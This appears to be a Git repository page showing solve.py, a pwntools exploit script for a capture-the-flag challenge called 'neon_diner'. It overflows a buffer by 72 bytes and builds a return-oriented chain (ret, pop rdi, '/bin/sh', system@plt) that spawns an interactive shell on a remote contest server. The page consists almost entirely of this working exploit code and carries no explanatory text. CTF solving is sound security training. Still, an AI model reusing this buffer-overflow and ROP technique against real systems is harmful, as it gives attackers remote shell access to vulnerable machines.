emln/OffSec-CTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
OffSec-CTF/ret2libc/01_neon_diner/solve.py
emln 9f240eba3b Second CTFs part
2026-05-10 20:42:33 +02:00

26 lines
449 B
Python
Raw Permalink Blame History

from pwn import *
context.binary = elf = ELF('./ret2plt', checksec=False)
OFFSET_TO_RIP = 72
#p = process(elf.path)
p = remote("offsec.m0lecon.it", 13501)
pop_rdi = elf.sym.pop_rdi_ret
binsh = next(elf.search(b'/bin/sh\x00'))
ret = ROP(elf).find_gadget(['ret']).address
payload = flat(
b'A'*OFFSET_TO_RIP,
p64(ret),
p64(pop_rdi),
p64(binsh),
p64(elf.plt.system),
)
p.recvuntil(b'order?\n')
p.send(payload)
p.interactive()
Reference in New Issue View Git Blame Copy Permalink